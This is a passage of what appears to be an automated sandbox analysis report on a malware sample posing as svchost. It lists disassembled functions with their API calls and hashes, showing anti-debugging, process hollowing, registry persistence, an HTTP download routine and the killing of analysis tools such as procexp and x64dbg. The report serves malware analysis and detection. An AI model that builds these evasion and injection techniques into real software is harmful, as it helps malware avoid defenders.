                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CreateMutex$CloseHandleObjectReleaseSingleSleepThreadWait
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2668954219-0
                                                                                                                                                                                                                        • Opcode ID: 8ba1766804ea08ca13b19edd77190db12eb59152ba2d842f089f97c6f6e86ecd
                                                                                                                                                                                                                        • Instruction ID: 3e13c10643325fc47f6e01a7e88da7eaa91425c1ad6a1522cd0a32ce02ab7833
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ba1766804ea08ca13b19edd77190db12eb59152ba2d842f089f97c6f6e86ecd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06F05E37A2878286EF50DB25A81936B26A1FFA5754FB05138F59ECA6D4CF3CD04DA700
                                                                                                                                                                                                                        Function 00007FF67E6D31B8 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
                                                                                                                                                                                                                        • Opcode ID: 2760cc306fb648241171a8ad32ec7adba68cc7e55a00feed93d80baffd57ff2b
                                                                                                                                                                                                                        • Instruction ID: 0a9e82ec0bdc0bb120034c7550369b7e92003e3c0728df1be21c257ec3d4bd5e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2760cc306fb648241171a8ad32ec7adba68cc7e55a00feed93d80baffd57ff2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35F03A2BD5C283C1EE308B65981833B6BA0BB65B08FB40174E19D8A594CF2CD50DAB11
                                                                                                                                                                                                                        Function 00007FF67E6D41F0 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4294037311-0
                                                                                                                                                                                                                        • Opcode ID: b286f069edb268d931baafffa844daa9a4e0797f43d90c92f4ac81a687af92b3
                                                                                                                                                                                                                        • Instruction ID: 58e01abcf417fef735518c71aa43c58c5745f98282dcc1171e9d0713c0a1df32
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b286f069edb268d931baafffa844daa9a4e0797f43d90c92f4ac81a687af92b3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7BF0C02A92C74282EE60DB51E40837F6370FBB6704FF00575F58E86654CF2DD85DA600
                                                                                                                                                                                                                        Function 00007FF67E6D32A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29threadCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D38D9
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D38EE
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3901
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3911
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3924
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3939
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D394C
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D3A75), ref: 00007FF67E6D3961
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4530: CreateFileW.KERNELBASE ref: 00007FF67E6D4577
                                                                                                                                                                                                                        • CreateThread.KERNELBASE ref: 00007FF67E6D3332
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D10D8: OpenProcess.KERNEL32 ref: 00007FF67E6D10FC
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Create$File$AttributesDirectoryFolderOpenPathProcessThread
                                                                                                                                                                                                                        • String ID: .x64
                                                                                                                                                                                                                        • API String ID: 60358384-2481150777
                                                                                                                                                                                                                        • Opcode ID: cfb86b0a92d015cb4aa6aafe66d7b99f94bc0349b2c07b1b75921d045ab39147
                                                                                                                                                                                                                        • Instruction ID: ec3f6e9bf24faefd029d1d829dc6f7661a638395827332520ef74b237719e6aa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfb86b0a92d015cb4aa6aafe66d7b99f94bc0349b2c07b1b75921d045ab39147
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29010C2BA7854281EF90DB21E8597AB6250AFB4B44FF04035F04DCA265CE3CE84DA710
                                                                                                                                                                                                                        Function 00007FF67E6D14EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 436 7ff67e6d14ec-7ff67e6d1528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: fcc9240df0fb9f1d8cd1eb24de5cde03531050d7ff1e9ad230f47a91af112976
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0E00277518F85C6CA20DB15F84411AB7B4FBD9B94FA04125EACD86B28DF3CC569CB04
                                                                                                                                                                                                                        Function 00007FF67E6D1444 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 437 7ff67e6d1444-7ff67e6d1476 GetSystemInfo 438 7ff67e6d1481-7ff67e6d1488 437->438 439 7ff67e6d1478-7ff67e6d147d 437->439 441 7ff67e6d1491 438->441 442 7ff67e6d148a-7ff67e6d148f 438->442 440 7ff67e6d1493-7ff67e6d1498 439->440 441->440 442->440 442->441
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: InfoSystem
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 31276548-0
                                                                                                                                                                                                                        • Opcode ID: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                        • Instruction ID: 15d728e4ece59671652d2351f1f050e760d5396f0d8c0df5468deaa0c57143aa
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd4e5232eadf4f87905bec873136a68cde2c0ceb075ae6d8ef107053c4164afd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51E065A7A2C04182FB708730E51433B62E1F764B44FF00535FA8DC26D4EE6CCA449B40
                                                                                                                                                                                                                        Function 00007FF67E6D3188 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Sleep$CreateObjectSingleThreadWait
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2604865191-0
                                                                                                                                                                                                                        • Opcode ID: b6bdd2cf4e76be4ba8532962c9c7f78b035e56d9f3cf65eeb5d64a8690f6978a
                                                                                                                                                                                                                        • Instruction ID: b5b7f24ee05b26f16bf362568efa7e96368cd1622e552db6f20d0b419d5a63e7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b6bdd2cf4e76be4ba8532962c9c7f78b035e56d9f3cf65eeb5d64a8690f6978a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AD0122AEBC143C1EA88FBB19C4D07B25A0AB65300FF00834F149C41D0CD1C949E6710
                                                                                                                                                                                                                        Function 00007FF67E6D3AF0 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 02a68683b8a88d890b7632b1029efc6fd5a6036bd7126e420ffe44a182f27b57
                                                                                                                                                                                                                        • Instruction ID: ef8e68822f67027355c3523518fca16d54089a706df82a9e77d8b9598e4abdd5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02a68683b8a88d890b7632b1029efc6fd5a6036bd7126e420ffe44a182f27b57
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28D0C926E3898281EA94DB26E889716A2A0FBD4B44FA08035E68981568CE3CC09D8B00

                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                        Function 00007FF67E6D24D8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                        • API String ID: 514040917-3001742581
                                                                                                                                                                                                                        • Opcode ID: a84cd30e02b54a1d7e6c2a6b1c87ff30d9e49ed3be8c7b01658cf5b106b86537
                                                                                                                                                                                                                        • Instruction ID: 5404099fde2a6c31beea550288280b953c84d18b39919ad963d61e8987e19d05
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a84cd30e02b54a1d7e6c2a6b1c87ff30d9e49ed3be8c7b01658cf5b106b86537
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D32D73661CAC586EB70CB16E8547ABB3A1FB98B45F604135EA8DC7B58DF3CD4489B00
                                                                                                                                                                                                                        Function 00007FF67E6D216C Relevance: 40.4, APIs: 22, Strings: 1, Instructions: 138networksleepmemoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 00007FF67E6D21A9
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Internet$CloseHandle$OpenSleep$HeapHttpInfoQuery$AllocateFileProcessRead
                                                                                                                                                                                                                        • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3
                                                                                                                                                                                                                        • API String ID: 2307068205-2771526726
                                                                                                                                                                                                                        • Opcode ID: fc41c48b696f2292e6165caa7080af249ce6d4eefb844c9705a23d0a02d259c6
                                                                                                                                                                                                                        • Instruction ID: ec3ad2f90e5ab549ba419b2c3673b1d408bef2bacec275cd39a74646879df6c3
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc41c48b696f2292e6165caa7080af249ce6d4eefb844c9705a23d0a02d259c6
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1971CC3652CA8282EB50CB55F85872BB761FBD4B94F705035FA8E87A68CF7CD4489B40
                                                                                                                                                                                                                        Function 00007FF67E6D3078 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4410: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D30B3), ref: 00007FF67E6D4458
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4410: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D30B3), ref: 00007FF67E6D4495
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D4410: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D30B3), ref: 00007FF67E6D44A0
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3B50: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF67E6D30B8), ref: 00007FF67E6D3B93
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3B50: RegSetValueExW.ADVAPI32 ref: 00007FF67E6D3BC9
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3B50: RegCloseKey.ADVAPI32 ref: 00007FF67E6D3BD8
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3BF0: RegDeleteKeyW.ADVAPI32 ref: 00007FF67E6D3C08
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DF0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF67E6D3E03
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DF0: Process32FirstW.KERNEL32 ref: 00007FF67E6D3E36
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DF0: CloseHandle.KERNEL32 ref: 00007FF67E6D3E48
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DF0: wcscmp.MSVCRT ref: 00007FF67E6D3E5D
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DF0: OpenProcess.KERNEL32 ref: 00007FF67E6D3E73
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DF0: TerminateProcess.KERNEL32 ref: 00007FF67E6D3E96
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DF0: CloseHandle.KERNEL32 ref: 00007FF67E6D3EA4
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DF0: Process32NextW.KERNEL32 ref: 00007FF67E6D3EB7
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3DF0: CloseHandle.KERNEL32 ref: 00007FF67E6D3EC9
                                                                                                                                                                                                                          • Part of subcall function 00007FF67E6D3980: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF67E6D3AD8), ref: 00007FF67E6D39B0
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF67E6D3162
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        • API String ID: 2853470409-928700279
                                                                                                                                                                                                                        • Opcode ID: 7025b17d87294329de3cc266a73b50fcb0614222f694bb80ca69dde199845389
                                                                                                                                                                                                                        • Instruction ID: 89ea943b3391231f07319eafd5e9f0fdea6f2b555d72739bc11fcb222026c5c8
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7025b17d87294329de3cc266a73b50fcb0614222f694bb80ca69dde199845389
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8121532BA7C94291EE00EB24EC962BB2325AFB4750FF04131F41DC61E6DE6DE54EA750
                                                                                                                                                                                                                        Function 00007FF67E6D3DF0 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000002.00000002.2785607471.00007FF67E6D1000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF67E6D0000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785566258.00007FF67E6D0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785647537.00007FF67E6D5000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785702904.00007FF67E6D8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785762609.00007FF67E6D9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000002.00000002.2785799899.00007FF67E6DB000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff67e6d0000_svchost.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7a16b558b3a5aabe8e9edc648b30ff0989d79b9dce4d7edaa0226f1c99cc9121
                                                                                                                                                                                                                        • Instruction ID: 923c016646a6ad52fcdce4555a59f8af40fd491ff5340db0d4e32ba78687217c
